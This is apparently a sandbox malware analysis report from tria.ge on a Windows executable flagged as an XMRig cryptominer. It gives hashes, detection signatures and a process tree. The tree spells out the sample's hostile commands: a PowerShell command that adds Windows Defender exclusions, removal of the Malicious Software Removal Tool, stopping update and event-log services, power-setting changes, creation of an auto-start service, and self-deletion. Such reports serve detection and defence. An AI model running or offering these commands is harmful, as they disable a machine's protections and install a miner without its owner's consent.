Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
18/10/2024, 09:31
Static task
static1
Behavioral task
behavioral1
Sample
3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe
Resource
win7-20241010-en
General
-
Target
3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe
-
Size
5.5MB
-
MD5
e5629c2b0355884c7a022372c1a5e160
-
SHA1
ba6c548fe73f1803797a8a93b6033ca4ba4af1eb
-
SHA256
3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775c
-
SHA512
523f09776fa764bb1b9e1b6465aaa3e44a9be0dafc662db197b9578451c6620a28a7f9e286652fcf0514ff6b4eb8b5c2ebba263afe764e085db4b911bc1e5281
-
SSDEEP
98304:KggSZTFznDHwE8oohoIgNgx+r3P4jw4fn9E32RW0O2gT/gQGhP3oFL6p4kvDZ/Hn:DgSZJznDHMo+JgNgx+r3P+e32BO2gjgj
Malware Config
Signatures
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/1380-28-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1380-34-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1380-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1380-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1380-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1380-31-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1380-29-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/1380-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 880 powershell.exe 2772 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
pid Process 1508 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 476 Process not Found 2348 fqwofdtexigy.exe -
Loads dropped DLL 1 IoCs
pid Process 476 Process not Found -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2340 powercfg.exe 2556 powercfg.exe 2104 powercfg.exe 604 powercfg.exe 2972 powercfg.exe 2704 powercfg.exe 2700 powercfg.exe 2744 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe fqwofdtexigy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2348 set thread context of 2084 2348 fqwofdtexigy.exe 86 PID 2348 set thread context of 1380 2348 fqwofdtexigy.exe 88 -
resource yara_rule behavioral1/memory/1380-27-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-34-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-26-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-25-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-23-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-24-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/1380-38-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2852 sc.exe 684 sc.exe 1500 sc.exe 1028 sc.exe 2128 sc.exe 2976 sc.exe 3048 sc.exe 3056 sc.exe 2720 sc.exe 3060 sc.exe 2656 sc.exe 588 sc.exe 2172 sc.exe 2336 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10c0db834021db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 880 powershell.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2052 3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe 2348 fqwofdtexigy.exe 2772 powershell.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 2348 fqwofdtexigy.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe 1380 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 880 powershell.exe Token: SeShutdownPrivilege 2704 powercfg.exe Token: SeShutdownPrivilege 2700 powercfg.exe Token: SeShutdownPrivilege 2972 powercfg.exe Token: SeShutdownPrivilege 604 powercfg.exe Token: SeDebugPrivilege 2772 powershell.exe Token: SeLockMemoryPrivilege 1380 nslookup.exe Token: SeShutdownPrivilege 2744 powercfg.exe Token: SeShutdownPrivilege 2104 powercfg.exe Token: SeShutdownPrivilege 2340 powercfg.exe Token: SeShutdownPrivilege 2556 powercfg.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 2960 wrote to memory of 2828 2960 cmd.exe 38 PID 2960 wrote to memory of 2828 2960 cmd.exe 38 PID 2960 wrote to memory of 2828 2960 cmd.exe 38 PID 1508 wrote to memory of 2792 1508 cmd.exe 64 PID 1508 wrote to memory of 2792 1508 cmd.exe 64 PID 1508 wrote to memory of 2792 1508 cmd.exe 64 PID 2328 wrote to memory of 1648 2328 cmd.exe 73 PID 2328 wrote to memory of 1648 2328 cmd.exe 73 PID 2328 wrote to memory of 1648 2328 cmd.exe 73 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 2084 2348 fqwofdtexigy.exe 86 PID 2348 wrote to memory of 1380 2348 fqwofdtexigy.exe 88 PID 2348 wrote to memory of 1380 2348 fqwofdtexigy.exe 88 PID 2348 wrote to memory of 1380 2348 fqwofdtexigy.exe 88 PID 2348 wrote to memory of 1380 2348 fqwofdtexigy.exe 88 PID 2348 wrote to memory of 1380 2348 fqwofdtexigy.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe"C:\Users\Admin\AppData\Local\Temp\3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2052 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2960 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2828
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:3060
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:3056
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:604
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2972
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JVNIRHNX"2⤵
- Launches sc.exe
PID:2720
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JVNIRHNX" binpath= "C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe" start= "auto"2⤵
- Launches sc.exe
PID:2656
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JVNIRHNX"2⤵
- Launches sc.exe
PID:588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\3a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775cN.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:2792
-
-
-
C:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exeC:\ProgramData\xhzmmmxzrrwn\fqwofdtexigy.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:1648
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2172
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2336
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1500
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:1028
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2128
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2084
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.5MB
MD5e5629c2b0355884c7a022372c1a5e160
SHA1ba6c548fe73f1803797a8a93b6033ca4ba4af1eb
SHA2563a55dc16338ebbbd5310f50424dd9196d97ac5e4edc8e161476ea0b55de0775c
SHA512523f09776fa764bb1b9e1b6465aaa3e44a9be0dafc662db197b9578451c6620a28a7f9e286652fcf0514ff6b4eb8b5c2ebba263afe764e085db4b911bc1e5281